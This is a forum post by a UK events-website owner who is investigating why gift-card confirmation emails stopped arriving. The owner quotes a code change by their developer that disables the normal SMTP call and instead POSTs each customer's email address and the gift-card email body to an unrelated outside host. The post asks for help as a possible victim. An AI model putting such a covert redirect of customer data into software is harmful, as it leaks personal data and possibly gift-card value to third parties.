Hi everyone,
I wonder if any of you can help me figure something out. We have an events website where people can book to attend live events or buy gift cards. Either way, once the purchase is complete, they receive an email confirmation. For the past week or so, with gift card purchases only, customers haven’t been receiving their mail.
It’s a problem that we’ve had before, although explanations and fixes by our developer have always been vague and, frankly, a little puzzling. For instance, we use the WP Mail SMTP plugin, but were told last time that the SMTP was not working for the gift card flow and that [the developer] had added an additional plug in to fix this. I pressed for more information but never got it.
Now, I’m no developer, but I know my way around Wordpress and have some basic knowledge of php. Enough that I can take a look and follow the flow. At the time I couldn’t find an additional plug in anywhere, or anywhere the the code had been altered to fix the problem.
With this more recent occurrence I decided to investigate, comparing old code to current code.
The original code, that I’ve compared from a backup, a couple of months old, looks like this (and comes immediately after the code that defines the email content itself):
$from = "[email protected]";
$to = $udata->user_email;
$subject = "You have booked a Gift Card";
$body = $html;
$name = 'Our Company Name';
smtpmailer($to,$from, $name ,$subject, $body);
}
In the current code, I found this insert instead:
$from = "[email protected]";
$to = $udata->user_email;
$subject = "You have booked a Gift Card";
$body = $html;
$name = 'Our Company Name';
//smtpmailer($to,$from, $name ,$subject, $body);
$url = "http://bigbobsmeats.ca/mail_service/mail.php";
$data = array(
'html' => $body,
'toemail' => $to,
'fromemail' => '[email protected]',
'subject' => $subject,
);
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
$t_success = curl_exec($curl);
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
}
Now, I must stress that bigbobsmeats.ca is not our company and not our mail server. I’ve never heard of them before and they appear to be a butchers based in Canada (we’re in the UK). I know $curl has many legitimate uses, but can anyone tell what this piece of code might be doing or why it might be necessary?
Or is it something more malicious?
Any insight would be greatly appreciated and, of course, do let me know if you need any other information to make sense of it.
Thank you in advance.
Kit